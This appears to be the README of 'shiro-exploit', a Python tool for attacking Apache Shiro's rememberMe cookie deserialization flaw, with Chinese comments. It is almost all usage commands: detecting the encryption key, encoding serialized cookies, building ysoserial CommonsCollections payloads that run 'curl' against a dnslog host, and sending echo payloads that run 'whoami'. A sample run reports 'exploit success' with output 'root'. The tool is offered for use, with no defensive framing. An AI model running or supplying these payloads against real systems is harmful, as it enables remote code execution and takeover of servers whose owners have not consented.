shiro-exploit
Shiro key检测,无需dnslog平台
python3 shiro.py check http://xxx/
获取check数据
python3 shiro.py check <key>
编码/发送序列化数据作为payload
python3 shiro.py encode cookie.ser http://xxx/
利用ysoserial
python3 shiro.py CommomsCollections6 "curl xxx.dnslog.cn" http://xxxx/
生成回显Payload
python3 shiro.py CommomsCollections1
发送回显Payload
python3 shiro.py echo CommomsCollections1 http://127.0.0.1:8080/login whoami
╰─➤ python3 shiro.py echo CommonsCollections1 http://127.0.0.1:9080/login whoami
Congratulation: exploit success
root
出现Congratulation说明存在漏洞,无法获取命令执行结果可能因为命令有误